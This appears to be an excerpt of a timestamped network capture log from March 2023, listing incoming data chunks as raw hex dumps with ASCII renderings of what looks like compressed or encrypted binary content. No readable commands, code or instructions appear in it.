                                                                                                                            2023-03-21 07:00:05 UTC272INData Raw: 36 76 41 03 d0 3f b9 7c f3 b1 d2 10 da 6a cf 1c 87 26 1e 88 1f 71 5d a3 34 d4 1c e8 bd 64 47 4d 2c 3f 69 c1 95 36 4a c3 6f 9b e7 6f 6e 66 8f fe e9 f4 96 e7 af cc 33 24 5a fd ea 9f a2 46 7f 68 63 54 c6 9c 79 86 29 4b 3f 65 f7 d0 b4 86 74 6e 8f 93 b5 e6 19 56 fe d0 dd 76 b7 0a f9 6d fd e3 81 93 73 0d aa f9 1d 1a 3d 96 b7 83 b4 52 ff 53 e4 5c c3 f3 81 ba cc f9 89 83 21 9d 5a 63 a3 d5 5c c3 ee f3 3f de a9 3e bb 1e a4 d9 96 29 7b e6 18 02 28 4d d3 6e 65 d8 9e a2 cb 8b fa cd 31 cc 7a 71 f3 c1 0b 29 e2 df b2 89 79 3d db 20 d9 4b 97 ed 7d 8f e9 25 97 c2 d7 42 da e9 fc 1f e9 1d d1 7f cc 6f 16 d8 6d b6 61 30 bf ef 5a 47 2f 4c 17 d6 1d 73 78 96 c1 6d 99 63 bf b4 3f d0 9f 1e e7 d4 f9 f3 4c 83 c4 6d 57 e0 a1 00 e4 4f da d4 aa cf 4c 83 56 55 b7 da 98 26 98 ce 09 bf aa
                                                                                                                            Data Ascii: 6vA?|j&q]4dGM,?i6Joonf3$ZFhcTy)K?etnVvms=RS\!Zc\?>){(Mne1zq)y= K}%Boma0ZG/Lsxmc?LmWOLVU&
                                                                                                                            2023-03-21 07:00:05 UTC288INData Raw: 5b 01 50 06 00 f6 bd d2 42 45 d1 40 1c 42 ec 83 4a a0 af 48 7a 83 1e 90 ff aa 84 37 13 e1 4b f5 95 55 76 d0 9b 6b d8 1d 61 91 cc 40 00 1a 6b 09 e0 95 95 e0 00 bd 49 10 58 94 36 70 69 85 28 b1 ce 7a 93 f0 b8 32 0b da 3d a2 b2 b2 63 f5 cd 92 0b b0 00 8d b5 bc 2e 44 81 3f de e3 07 60 ac 9d d2 22 bb 14 01 97 6b 8d 70 b7 4a 1a 73 cd 34 70 f7 82 7d 09 8b 2f 95 a3 0a 77 07 3d f0 bd 01 e3 3c 0b dd 09 ec c3 79 b8 be 6c aa 8a 64 6f 41 4c eb 6d 1c a6 73 0f 0f 8b ee d7 65 5f 2c 5b ac 03 be 2f a8 cf b9 47 69 07 2e ad 80 01 43 6b ee bc c4 09 d7 85 57 b9 b2 3f 89 25 9b b1 3f 62 49 77 63 3d c2 24 a0 a9 5c d8 15 f3 2c 4c 3e ab 27 30 f9 d3 4b cb 84 74 03 40 c0 cd f2 36 c0 4d 24 c1 74 47 6e 5e b1 0a 0b 6b 31 15 38 a4 a2 5d 82 60 4c aa 84 39 dd 78 99 ed 34 cf fc 4c 67 75 3d
                                                                                                                            Data Ascii: [PBE@BJHz7KUvka@kIX6pi(z2=c.D?`"kpJs4p}/w=<yldoALmse_,[/Gi.CkW?%?bIwc=$\,L>'0Kt@6M$tGn^k18]`L9x4Lgu=
                                                                                                                            2023-03-21 07:00:05 UTC288INData Raw: 53 ca 5b d0 7f f3 9c d9 2e 73 2b 1f 26 5e 8a a9 3d 82 0b 87 02 6c 03 0b 99 c5 02 19 1b 10 07 6b 57 05 f7 39 48 c4 f0 97 b8 1f c3 da d4 c5 97 10 d2 b9 1c b0 b6 ec a3 39 e6 c2 fe 42 61 e9 9f 26 3e cb 0a 56 30 f0 c3 66 cc a9 24 f2 d0 f7 03 ad 99 b2 58 58 c8 27 fd 06 11 76 97 a5 b0 95 50 f8 07 80 26 37 32 3e f7 bd 34 df cd 33 27 c5 d1 3a 59 2a eb 79 49 29 1d ac b4 e5 43 dc 54 6f 7c 22 dd 04 1a c9 ee dc b8 c5 a8 49 6e bc 8a 86 f5 60 8c 22 79 b4 1d 3f 82 1b 4e 08 b0 fd aa d4 bb 9b f5 b5 54 f3 a3 3b a9 c6 11 66 88 64 6b e3 f3 2c 6b 8a 6d 54 05 f5 11 61 6d cb 15 68 be bd a5 4c 94 50 26 19 a0 c9 ee c6 e7 c9 ee ac 71 76 65 91 7c f6 c1 6c 33 a6 9f 80 f9 2b 19 ad 51 5a 3b e3 53 7c 82 7b a6 0a 76 1e 7b c0 82 ed 2c 60 d7 d2 93 07 bd c6 67 88 bb b6 0a ee 43 10 71 9b 65
                                                                                                                            Data Ascii: S[.s+&^=lkW9H9Ba&>V0f$XX'vP&72>43':Y*yI)CTo|"In`"y?NT;fdk,kmTamhLP&qve|l3+QZ;S|{v{,`gCqe
                                                                                                                            2023-03-21 07:00:05 UTC304INData Raw: 12 cf 60 b4 c2 95 a2 e6 9e d0 15 0a 04 3d 0b 51 fe ad 85 3e 25 90 7f ef d6 eb 6f c9 91 27 48 90 34 c5 37 8b 5e 69 c2 5d c1 4c 4f 0d 32 88 a7 6c ab 5f 01 80 eb 83 7b 0b 1a 61 84 b4 33 37 89 c1 d3 16 f5 98 14 1b 56 a5 59 a5 62 b3 7c 75 df 13 15 39 5e d3 8a e8 8a cd 55 6c 9a b3 d0 a8 6f 36 67 af 1d 34 27 dd ab 38 2c 2c 7a 38 78 de 7a 7d a1 11 d4 58 af 47 b2 9e 19 9b 3c cf 5e 2f 51 e8 32 14 61 e2 e4 40 f4 39 d7 f7 21 9d c4 bf 31 f1 96 b6 43 33 b2 14 fa a4 6e 85 c6 7f 17 80 d2 d1 e6 28 22 fa 3e 5c ea 6c bc 20 d8 7a 41 21 80 d4 ea 22 dc 11 24 8d f5 14 1b ee 6d 16 c9 5d c8 e2 ac f1 15 72 82 cd 5d e0 50 8b 03 89 5a b5 07 bb ec 43 54 50 e5 c6 26 d8 5a ac a5 f3 5e b4 cd c6 3e a2 7a ba 40 32 c2 d8 d5 cc 15 1a 33 99 b2 a6 20 e2 04 ef 7a e4 b6 3a 1d 90 65 7b 11 12 0d
                                                                                                                            Data Ascii: `=Q>%o'H47^i]LO2l_{a37VYb|u9^Ulo6g4'8,,z8xz}XG<^/Q2a@9!1C3n(">\l zA!"$m]r]PZCTP&Z^>z@23 z:e{
                                                                                                                            2023-03-21 07:00:05 UTC320INData Raw: 79 05 f9 5b 56 2e cc 1f 46 6f 69 7f 24 1d bf 22 5e 1e b1 8f e2 15 e8 99 bd 71 75 6d bb 09 b8 a9 6a a5 c5 a4 b4 58 80 35 16 2f 47 5e 0c b0 95 53 cb ea 5a 49 e7 c4 54 80 86 b6 21 85 ce 8c da 75 35 34 94 b8 28 51 e2 02 56 82 83 19 8b 78 32 f1 21 49 37 7a 4d 80 5b 2e 20 bb d9 31 5a d0 a2 f8 79 a3 97 9f 2f 8d 38 ba f2 dd 56 d8 4c 2e 63 8f e2 b5 91 08 5d 03 7c c4 4e 0b 27 02 7d bf 7a 0d 6c 3e f8 eb 86 bf df ad d9 ca e8 bb 1d ee f7 75 68 be 8d e8 a7 9a aa df 47 2e f5 51 4c d4 ed b1 3a 3d 36 d5 63 6d fc df 09 aa bf 63 6b 3b b2 71 07 05 95 85 76 93 68 45 0d 80 95 69 00 e6 c9 a7 0c e6 4e 05 a1 f4 58 00 03 01 17 02 30 16 85 54 3f fd d5 71 58 24 73 97 c3 3a 8b 5e a8 e5 c9 9d fb 2f 8c ef 3b 2d a4 aa cd c0 14 1f 57 b5 34 8d e2 3f a0 55 dc a6 78 b6 30 c9 c0 76 85 09 b6
                                                                                                                            Data Ascii: y[V.Foi$"^qumjX5/G^SZIT!u54(QVx2!I7zM[. 1Zy/8VL.c]|N'}zl>uhG.QL:=6cmck;qvhEiNX0T?qX$s:^/;-W4?Ux0v
                                                                                                                            2023-03-21 07:00:05 UTC336INData Raw: f9 9c cc cf cb d9 47 76 3a f7 a3 83 83 b1 d7 e8 ee 13 2f 20 a5 d6 9c d2 51 67 1f 9a 34 19 dc a3 30 39 2a a0 77 f8 bf 64 98 d4 bc e5 74 67 9a 1f ba 8f c9 44 a3 46 f7 a1 b5 ed 93 39 f3 fa 30 82 e1 1e 90 2e 04 fe d4 59 fa 6e b3 19 c6 0a c6 10 99 ef 52 18 cf 77 35 ed 33 8e e4 43 af 30 fc db 25 c7 54 f3 fa 56 1c b3 d2 b7 c3 fc 3a 05 40 46 cd 04 81 81 af 11 9c 03 38 32 b0 de 85 9c 01 b9 dd c2 e1 8c dc c1 43 27 a1 40 39 1b 45 51 30 01 d9 5f 08 78 a3 40 b2 34 a6 90 5e a7 5b 68 ba 02 7e 37 5d 4e 24 4b f4 62 52 ba cf 59 3a d0 24 38 bb cd 1b 1b 54 34 67 1c aa 53 99 3e 1f b6 0b 73 88 38 aa 36 58 30 a8 d1 49 55 bd 46 b2 5c 83 11 c9 0a dc 82 99 85 94 2b 80 c1 de f0 1a db f9 fb a2 46 80 09 3b 2d ff 86 e3 f4 19 62 9c d6 00 9b 86 27 71 1a 1e 63 d3 e0 b7 37 b7 23 84 f3 31
                                                                                                                            Data Ascii: Gv:/ Qg409*wdtgDF90.YnRw53C0%TV:@F82C'@9EQ0_x@4^[h~7]N$KbRY:$8T4gS>s86X0IUF\+F;-b'qc7#1
                                                                                                                            2023-03-21 07:00:05 UTC352INData Raw: 6f 0e a6 aa d4 53 91 ef a5 fd f8 35 de 5a 46 08 04 77 fa af 0b d0 98 bd 6a 88 9d a6 b6 9b 40 da 47 2c 77 c2 83 23 9a 25 5e 4e dc c3 6a 99 69 62 ac 61 53 54 c0 58 c3 85 d0 ba fc 2d 81 0b 07 ac 64 12 e9 8e ce 24 c7 e4 7f 1b e5 3d 26 72 8a 29 9d 6e 76 76 8b e9 a4 4f 3e 12 17 ff 85 00 ed 78 bd ec 85 d6 1e 34 ce 93 86 87 6a 59 22 20 3c c4 e7 e5 e5 4c b4 a6 97 4c e3 b8 a4 72 e7 02 5a 78 01 ea 64 5d b4 ae 21 ae 9e 73 c6 c6 cc e4 5a 04 c7 60 f4 1a 18 df 36 9b aa 3a 7b c4 59 4a 95 90 5f eb 4a 1e 34 01 07 ad 13 53 33 97 9b 0a ea 4c 6b 0e c0 47 87 15 46 a6 11 0b b4 00 79 a6 b5 68 ab 5d 67 52 96 d9 6d 89 73 b3 68 06 3b 39 fb de 64 74 c0 b4 42 77 e4 98 20 0e e3 54 81 94 e9 a9 4f 1c 3f e0 23 63 a1 51 ba 94 78 f5 c5 03 4f c2 81 65 a8 a4 91 7b 97 6b 5e bf 69 f4 65 0b 33
                                                                                                                            Data Ascii: oS5ZFwj@G,w#%^NjibaSTX-d$=&r)nvvO>x4jY" <LLrZxd]!sZ`6:{YJ_J4S3LkGFyh]gRmsh;9dtBw TO?#cQxOe{k^ie3
                                                                                                                            2023-03-21 07:00:05 UTC368INData Raw: ae e1 74 42 93 af 97 b9 dc 7c 0c f3 cc ae 83 6d e4 3f da e0 eb 39 99 8e 22 6c 36 f4 02 47 d9 d9 35 11 b0 f5 27 24 a7 fb 39 3d 8c 23 69 5c 0f 76 74 c9 31 f6 06 e3 ee 72 3b b9 e1 37 9c df 29 b6 1f 7a e5 49 b3 13 23 e9 a7 2f 12 21 0d bf c4 48 5b c3 42 d8 79 52 a7 0c 74 0a 73 6f 18 22 05 96 a7 41 81 c2 80 28 8b 9a a0 3c 08 2e aa e7 db 9d b7 02 bd 5b 98 aa f0 05 05 b0 8c 62 7f 03 2c df c6 11 a9 18 f5 2b 2e 95 aa c6 22 8b 92 18 a1 96 d3 0a 5f 63 f0 34 37 e3 2d f0 d3 db e8 6b da 29 b5 c9 cc 1c 0f af b9 7d c9 14 21 dd ef b9 28 2e 99 04 9c a0 ee 03 4b c5 62 8b 9d e4 4d 51 c2 0a de 44 03 af e9 76 3b e1 69 4c 7f 7d 49 7a 36 2d 73 93 8e be 4b 9f 8a 46 34 51 d2 cd a4 0f 83 58 a3 f0 10 c4 70 70 fd 49 7b 9a ca 52 cc 6e d2 32 ee 01 33 81 e9 90 07 f9 2d af 51 b1 0d 4d 86
                                                                                                                            Data Ascii: tB|m?9"l6G5'$9=#i\vt1r;7)zI#/!H[ByRtso"A(<.[b,+."_c47-k)}!(.KbMQDv;iL}Iz6-sKF4QXppI{Rn23-QM
                                                                                                                            2023-03-21 07:00:05 UTC384INData Raw: 28 22 dd 50 3a 84 5c f8 b0 45 0e f1 43 66 dc af 0d 11 61 07 7e 4b 45 d8 06 f4 20 2b bd 2a 44 d4 b7 d6 91 db 60 09 2b cd a7 c8 d1 9f e8 42 79 36 e1 42 75 c4 cf 8e f7 06 33 a7 c8 f8 a9 6e aa 1a c9 5e 41 b9 4c d3 48 d2 cb 7f 94 52 77 4c de a2 74 bc ff c2 75 b1 d6 eb d0 05 b4 40 4f c9 54 c9 79 85 b5 32 7f a8 2e da d3 f7 49 9b 2e 97 e7 ea 9c e4 19 97 4c 32 61 27 01 94 f0 56 f0 b2 bb 92 ac 22 68 43 6f 46 6a 7d b5 4e 62 a9 97 22 33 99 9c 64 a6 fc 35 5c b0 ea 69 4a 61 de 7a 3a 94 d8 9e 26 49 bb 28 f3 0c ef fa d9 d9 c9 fe ec 98 6f 21 1b e6 02 bb a3 66 2a 4c a9 ec 43 e9 42 ea 1c 60 8a b9 bc e4 94 72 02 cc fb 8f 3a 9b ca 7b e9 de 38 cf 84 ee 8d ec 46 00 b9 1b b6 ce 2c 45 23 4e ee c2 22 12 7b 42 b9 52 d1 ef c1 17 02 09 ef ed 99 57 c7 a0 29 b2 b1 e4 d5 00 26 de 44 31
                                                                                                                            Data Ascii: ("P:\ECfa~KE +*D`+By6Bu3n^ALHRwLtu@OTy2.I.L2a'V"hCoFj}Nb"3d5\iJaz:&I(o!f*LCB`r:{8F,E#N"{BRW)&D1
                                                                                                                            2023-03-21 07:00:05 UTC400INData Raw: 97 96 bd 9a 44 b4 83 ed f9 da 5a f1 14 1a 13 58 fe b6 3b 3c a1 31 9d a6 4a de d6 ab e6 9f 89 2e b6 68 c1 3e cd ca 2b 15 57 5e 99 45 74 e5 b5 f9 0c 2a 8b f5 d7 fb 9d c4 fd ba aa b1 88 ab de 50 41 56 e2 51 4d f8 fe 4e aa 30 ce bf 59 59 94 01 c1 60 6a 59 ff e6 5d 14 96 9b 72 fa 9f 41 7a 6a ac 40 67 3f 3d c1 e4 20 8a 16 9c 97 70 21 57 52 1d b7 90 8b 78 6a ce 76 39 86 61 21 37 9e 94 16 a9 e8 ba c7 53 13 e9 72 9c 55 d7 74 a6 40 65 a8 de b8 aa 1c 6d 2b 7d 7d 11 96 79 58 33 79 fe 51 5c d8 4d 43 58 71 bb 84 5b 40 b4 43 dc 18 b6 cd 19 ee e8 63 52 3a ce b9 ae 93 a6 f3 29 79 3a fb 94 e9 dc 3a 1c e3 bc a6 68 02 80 75 1d be 8b da 12 a0 57 eb e8 8c 0e 90 8e 02 98 51 7e c0 5f 6a c5 57 78 f8 f1 52 6d 75 58 9d a9 0e 24 91 dd d2 2e 94 bf 8e d3 5d 57 e8 64 d6 e7 4b 9e dd 1f
                                                                                                                            Data Ascii: DZX;<1J.h>+W^Et*PAVQMN0YY`jY]rAzj@g?= p!WRxjv9a!7SrUt@em+}}yX3yQ\MCXq[@CcR:)y::huWQ~_jWxRmuX$.]WdK
                                                                                                                            2023-03-21 07:00:06 UTC416INData Raw: e6 d6 6e 87 0c ce 02 e5 0f 8f 22 27 e8 0b 11 fc 30 46 c9 5b 34 5e 01 32 74 e1 c4 8b e3 ad 9c b8 d1 62 86 78 f3 8c c9 09 de d5 5c 89 06 b5 ee cc 10 2e bb a9 d7 4f a4 f2 ce 90 00 56 c9 84 0f 8c 11 c8 35 87 2c 25 99 c6 88 91 1d 91 21 0f 03 10 11 0d a7 38 90 42 9e 50 1a 33 49 4c 07 93 44 bd 6e 92 f8 36 0d 4c 12 89 60 92 20 39 71 e5 a0 f9 21 37 99 7e 5d 60 98 b8 47 55 ce 68 9a b1 48 58 02 18 8e be 60 06 30 50 c3 c5 fb b7 da 6d 44 bd fc 06 e6 a2 f7 d8 5a 10 4a 51 7e fb 42 ab c6 86 6d 64 14 43 5f 88 62 48 a0 8b b7 f2 f3 6f 60 d1 ae 3e 61 98 3a 60 6d 51 9e 7f 0e 4d 1d 5f ea a6 0e 50 2f 94 cd 34 11 ab 10 92 94 bc 17 0c e4 bf fd 56 88 6a 38 a2 db 40 0e 1a 36 90 33 16 1b 48 fc 0b dd d8 40 e6 7e d3 bd 0d e4 26 6b 7a 81 3c 44 1c 89 df 5d 99 2d 9f d9 30 06 b6 a5 b0 69
                                                                                                                            Data Ascii: n"'0F[4^2tbx\.OV5,%!8BP3ILDn6L` 9q!7~]`GUhHX`0PmDZJQ~BmdC_bHo`>a:`mQM_P/4Vj8@63H@~&kz<D]-0i
                                                                                                                            2023-03-21 07:00:06 UTC432INData Raw: 35 90 b0 6d 4d 7d b2 5f 85 ab 8a 32 fd 97 93 b8 55 7f 3a 19 01 e4 34 e8 fd ea 83 38 8a 94 c1 9f 11 26 4d d8 ce 94 5f 10 ae 71 17 28 62 9d 89 46
                                                                                                                            Data Ascii: 5mM}_2U:48&M_q(bF
                                                                                                                            2023-03-21 07:00:06 UTC432INData Raw: e9 90 75 bc 5a a3 af ff ab 7e e6 6b 11 14 3b ce 8d d0 8b 71 64 42 e5 67 6e a4 1f 81 af 45 df 10 f7 b5 90 c0 65 4a 45 8d 0e 20 03 ed 36 ae 26 8b 8a 8e 92 c6 94 9c a0 e3 bb d7 aa 6b 01 ad 2e 2a 28 4f c0 46 3b f1 06 38 c2 c1 94 4f 75 26 f9 f1 16 8c c4 9e 00 c8 ab 41 7e 94 5e 6c 93 b7 a8 1f 49 ea 17 38 51 1c 27 02 9b cf 1c 30 ce d9 f8 bb 5b 95 39 f5 4b b0 a5 ec fe 0f d4 31 40 91 d6 50 a9 96 9a 2f 82 0f 86 0f 6f 05 6b a9 27 86 03 72 86 8f f5 35 9b c1 13 c3 b7 17 1f 2f 83 84 3c 3c a1 3f 1e a5 1e 08 4a 54 7c e8 95 41 23 d4 33 fe 12 16 9a 2b 9d 99 a4 36 32 18 e5 bd 60 bf 38 01 63 65 ed 84 ea f8 b2 83 0a 4b ce b7 c8 67 d2 7c b1 d5 1b 03 23 d6 9a 2d d7 77 af e8 47 37 05 5c d8 68 81 4c 1c 1d 13 50 4f 48 42 d5 ce 31 2c b8 66 e0 6a 02 6f 21 c4 22 13 31 0b a6 be 45 6e
                                                                                                                            Data Ascii: uZ~k;qdBgnEeJE 6&k.*(OF;8Ou&A~^lI8Q'0[9K1@P/ok'r5/<<?JT|A#3+62`8ceKg|#-wG7\hLPOHB1,fjo!"1En
                                                                                                                            2023-03-21 07:00:06 UTC448INData Raw: dd b0 e0 56 20 39 a2 24 6a 41 8b 74 8a 4d bc 67 51 17 a0 5e 01 32 7b ef 90 3d 87 b9 11 84 3c 1f ba ff 3e 8f de d7 4a 57 6e fe c4 5b 3b b8 24 2b 6f 2a 1b 41 0e 84 d2 8c 53 d2 c4 52 7d a5 11 80 74 49 95 bd 62 15 11 2e d0 b6 dc 05 81 69 cd dd 9f ba ee 10 be d2 e3 e0 59 f0 36 e2 f0 fd 34 bb 51 df 80 e7 d4 6d 1d d6 86 0a bd 68 ef f0 1a 06 7b e7 26 1a 80 f5 51 cc 2f 7f 3e 88 79 9b d7 74 ab 77 fe 48 83 d5 6e 2c d7 3b fc 13 89 ed 79 3c 8e d1 29 31 30 23 b4 13 b4 60 81 67 00 41 d2 e6 af 25 13 9f 47 8d 77 3b 1e 49 30 92 5b 10 59 4a 0c f6 58 a9 76 45 5d 4f 47 34 ce 92 d0 6d f9 67 ad 87 f8 c1 de f8 28 7d 7e bc 74 a1 fb 43 cf 87 dc 2c c9 06 58 eb d0 1f d1 1f f6 ae d7 19 ba 4f a4 5c 90 0a 49 1a 32 18 7d a3 c3 45 fe f1 ba 72 10 8c 1a f1 ce 23 df fe 01 db 04 85 35 a7 35
                                                                                                                            Data Ascii: V 9$jAtMgQ^2{=<>JWn[;$+o*ASR}tIb.iY64Qmh{&Q/>ytwHn,;y<)10#`gA%Gw;I0[YJXvE]OG4mg(}~tC,XO\I2}Er#55
                                                                                                                            2023-03-21 07:00:06 UTC464INData Raw: 2d a3 81 a2 67 7b 8f aa 17 cf a5 7a 71 0c 1c c2 0a 59 9a 5e 1c bf 1d 0a 14 41 90 3f 18 d6 a3 29 14 b7 51 ed b6 31 bc b5 ed d9 c1 06 6d a2 ca 71 0a ad 17 eb f1 1a 72 1c c1 74 6f 85 d2 15 d1 52 fa e1 ec b9 50 6c 26 ea c8 a7 84 e3 ac 26 14 99 d2 a7 01 86 3a f2 03 73 02 41 1d 39 86 39 c8 4e 0c f1 d6 da 0e 5c 50 75 e4 fb 26 05 75 e4 5f a3 82 b3 3f 31 5e 1b 2a 19 3d 25 94 26 86 57 1b 13 8a 7c 85 ea 46 71 8c 10 c7 9c 00 15 15 95 fa 66 c3 97 b7 56 1f d2 91 63 30 bb c9 4f 09 72 fc 9c 40 98 8e fc 95 70 9c d6 0c ed d1 74 e4 8e 8b 97 e1 74 8b 2d 58 f3 4d 97 03 5d 16 8a 8d 47 a0 a7 7f 11 06 74 7e 28 b2 bb f7 b2 ac 37 87 62 3f 42 35 f8 de cf c3 b2 5e 15 8a 7c 2b a4 23 c7 c8 d2 a7 60 ac 39 08 51 24 13 aa 23 8f 57 74 e4 87 4e 28 3a f2 da cf 14 1d f9 dd c7 fe 8e 24 74 45
                                                                                                                            Data Ascii: -g{zqY^A?)Q1mqrtoRPl&&:sA99N\Pu&u_?1^*=%&W|FqfVc0Or@ptt-XM]Gt~(7b?B5^|+#`9Q$#WtN(:$tE
                                                                                                                            2023-03-21 07:00:06 UTC480INData Raw: 61 5c f4 70 20 9f 61 dc 1b 42 1e 8d 46 cf e9 a1 64 e8 f1 69 ce f5 c8 91 e5 dc 93 1b f8 59 84 e1 fa 01 85 69 63 c8 c6 b7 31 4c 79 21 22 94 36 23 ba 5b a4 8d b1 29 af 8d b1 a6 30 a2 5e d6 b9 fc a7 08 e5 65 ea 7a 83 85 81 76 0c 59 b5 eb 06 2c 84 86 e9 0c a3 5c 0b 86 55 0b 0a 61 d5 8d 3c 98 24 a2 38 be a2 90 3d 21 2f 9e 4f 66 a3 14 23 90 45 37 0a d9 84 30 93 21 2b 63 b0 34 d0 0e f9 ab 6f 63 6c f9 81 fc e5 50 4c 51 52 37 87 dc 23 d1 5f 06 a5 a3 23 0d 0c e3 0a c6 26 52 95 53 b7 1e 05 88 20 93 41 0f 9b 9a d1 1f 99 c2 4f f4 17 d7 46 2a a0 9c eb c9 62 38 f7 4c 5a a1 8a 31 5c 1b a8 fc 5b 75 51 25 22 55 32 d2 a4 3a 51 9a 4a 07 05 21 f5 4b 9d 64 fc bd 28 6c 2c b2 28 69 a3 34 97 56 15 98 b0 c0 21 a4 be 7d 30 0a 7b a0 8e 3c 88 9f 47 a9 12 63 32 45 18 46 d9 ae a5 92 11
                                                                                                                            Data Ascii: a\p aBFdiYic1Ly!"6#[)0^ezvY,\Ua<$8=!/Of#E70!+c4oclPLQR7#_#&RS AOF*b8LZ1\[uQ%"U2:QJ!Kd(l,(i4V!}0{<Gc2EF
                                                                                                                            2023-03-21 07:00:06 UTC496INData Raw: be 90 e5 c3 db b7 09 0b 6c 86 f2 41 4f f7 db 33 d6 30 3e 78 df cf 39 27 31 92 0f 41 56 87 6a d2 47 f3 a1 79 68 19 e1 35 86 0f ce 03 e6 28 ec 1e 8b e6 6f ef af 55 ea aa f1 61 48 80 e8 74 6c 22 4a e7 f0 dd ee e4 49 7c d8 46 bd e7 f8 50 bd d3 b7 77 d7 34 3e 4c f4 9f c7 9a a1 c3 87 43 fc 2d 9d 62 7a 7c 48 fe 20 a7 95 35 93 0f 3f 9f 5b 95 3d 9c cd 87 73 1b 2e cb d9 b0 f8 f0 6e ef d9 f0 05 1c 3e 9c 74 3a 50 ab 38 9f 0f 21 1c a3 4b 35 0b f9 90 67 6a 14 18 b2 84 0f 1a f6 6e 86 e7 97 f3 21 c0 b0 e3 f0 d6 55 7c 00 9f 88 21 ba 6b f8 60 3e fc fb 44 09 43 3e ec b3 fb 10 5e 68 f4 ab df c1 b3 13 51 9b a6 22 f4 f9 26 12 6a 82 50 ff f8 87 e1 27 11 c6 fd 68 b6 0d 40 f8 d0 cd 3b eb 33 42 55 b9 44 dd 41 22 7c b8 fa e8 e0 d5 19 08 d7 72 3c da cc 11 06 54 4d 31 bc 84 70 e0 8d
                                                                                                                            Data Ascii: lAO30>x9'1AVjGyh5(oUaHtl"JI|FPw4>LC-bz|H 5?[=s.n>t:P8!K5gjn!U|!k`>DC>^hQ"&jP'h@;3BUDA"|r<TM1p
                                                                                                                            2023-03-21 07:00:06 UTC512INData Raw: 57 1a bf cc 14 de 83 38 f2 65 69 0b db 1b 6b 3d 9c 13 f6 49 95 d5 cf e8 67 55 c1 55 ae 17 b7 66 f6 22 ef d4 94 d1 f1 1f f5 77 8e 79 36 25 73 eb 9e c0 82 e7 03 ca e8 4f 97 4c bd 5b 74 3a 31 53 78 47 e2 42 c2 63 e9 d2 6d 7e 1e 21 54 fb bf 86 c5 96 d1 8b d6 ce bc f4 de e6 ed fc 3b 36 65 74 e9 f4 8d 07 bf c9 59 e8 71 eb ca f5 d2 5e df 94 d1 c1 59 97 9e 4d ff ed 33 0f e1 fd 89 3b c3 4b 7e dc ea b3 dc a3 79 d1 cb cf 7e 2e 2c a3 dd e2 63 33 6f 96 7c ea f1 1d 79 e7 a6 8c be 1b 12 76 d9 f6 97 cd 99 c3 a3 2e ec bc d1 fa 39 fd e8 e3 a3 31 29 8b 36 64 0a ef 56 ec f3 f8 a9 7d d6 d2 84 4c f9 47 e1 67 76 8d 7b 4e 7f fe e7 5f 8f b7 47 a7 66 72 ef e0 40 f8 c7 ed 45 6f 1d f9 cc e3 e5 e9 ad 57 5b a6 3e a7 1f b4 ff fc fd db 5b 92 3c 84 f7 2e f6 8d f4 b5 1a 3d f0 13 8f 5f 7d
                                                                                                                            Data Ascii: W8eik=IgUUf"wy6%sOL[t:1SxGBcm~!T;6etYq^YM3;K~y~.,c3o|yv.91)6dV}LGgv{N_Gfr@EoW[>[<.=_}
                                                                                                                            2023-03-21 07:00:06 UTC528INData Raw: c6 d5 b8 14 2e 3f a8 99 40 02 52 47 73 01 4c 95 64 d1 a7 ee bf 2d 9e 8d e9 19 bf 09 46 c3 34 12 7d f1 24 88 3a 93 8b 3a 19 0c a6 36 2c 6e 24 53 3b 69 f1 70 d6 3b 10 79 e4 2d c2 19 0a 3f f5 00 76 98 73 d7 f9 b8 1b 9f ab 34 74 42 47 6f e2 10 19 1c 13 a7 39 f7 02 bb c1 01 7d 63 89 af b7 66 98 f3 d4 f7 8f 77 5c 9b 16 bf 02 80 12 89 f0 ec 8f 08 ed 1d 89 9b f3 19 0f f6 2c b3 70 b4 8f 37 0b e7 56 10 14 41 c1 cc b1 ca 10 36 5e 9a fa d9 1c 6c 90 6a e8 2e 97 48 35 3f 4a 5c 47 ea 3f 0d 0c f6 50 21 f8 a5 2e 50 20 3b e8 7f 22 8d a5 60 35 e8 a9 21 67 87 86 49 f5 db d0 97 78 b1 de 0a 8d 48 cf e2 a6 e7 03 a9 e4 85 e1 34 44 96 18 35 9b ab 48 33 41 ec e4 aa 52 64 e0 39 cc 63 4a 35 71 ac 6a e4 58 d5 d0 b1 aa de c0 ba ce 63 55 0e 63 d5 ef 21 82 44 d2 4b bc 89 95 f4 92 b7 89
                                                                                                                            Data Ascii: .?@RGsLd-F4}$::6,n$S;ip;y-?vs4tBGo9}cfw\,p7VA6^lj.H5?J\G?P!.P ;"`5!gIxH4D5H3ARd9cJ5qjXcUc!DK
                                                                                                                            2023-03-21 07:00:06 UTC544INData Raw: 3d 32 6e 6c 94 79 10 11 30 0b a9 8c 06 98 43 a8 2e 9c ce ca 7b 86 50 59 e6 71 80 37 82 b8 51 72 e6 d8 28 6e d4 18 65 d6 ff b1 95 40 c6 98 4b 4c d0 b6 a3 a7 cd 03 de 1c 8f f2 7c 36 97 e6 aa 74 e2 bc 39 26 d7 15 70 45 93 ba ce 34 e9 e6 10 42 e8 b9 1b 73 6b 3c 18 7a 00 e9 5b b3 22 e3 02 41 01 47 21 9a 2d 9d 10 19 37 37 66 5e dd 30 47 51 7d cc a8 e5 a3 8a 9b c3 51 36 8e b2 36 8d 4b 91 1c 6b 50 d3 48 6f 37 53 02 b8 3e 09 43 e5 0d 6c c9 57 05 50 df 71 63 46 60 64 1c 61 a7 79 33 38 46 04 fc 7d 24 a3 7d 02 a6 2d 30 c9 92 99 14 e1 e8 b8 48 93 cf 36 2c c1 c4 85 91 71 23 22 a3 a6 81 5c 18 ed e3 3f 02 14 9a fa e5 82 5e db 5c a4 9c a7 9e cb 89 5d 2e 00 47 7b 7b 41 02 70 5e 94 14 dc 7c a5 e7 c7 f9 02 47 a9 e3 22 05 ba 70 ef 4e 77 c8 7a 1a 40 f1 6b 15 bd 70 7d 13 e6 4e
                                                                                                                            Data Ascii: =2nly0C.{PYq7Qr(ne@KL|6t9&pE4Bsk<z["AG!-77f^0GQ}Q66KkPHo7S>ClWPqcF`day38F}$}-0H6,q#"\?^\].G{{Ap^|G"pNwz@kp}N
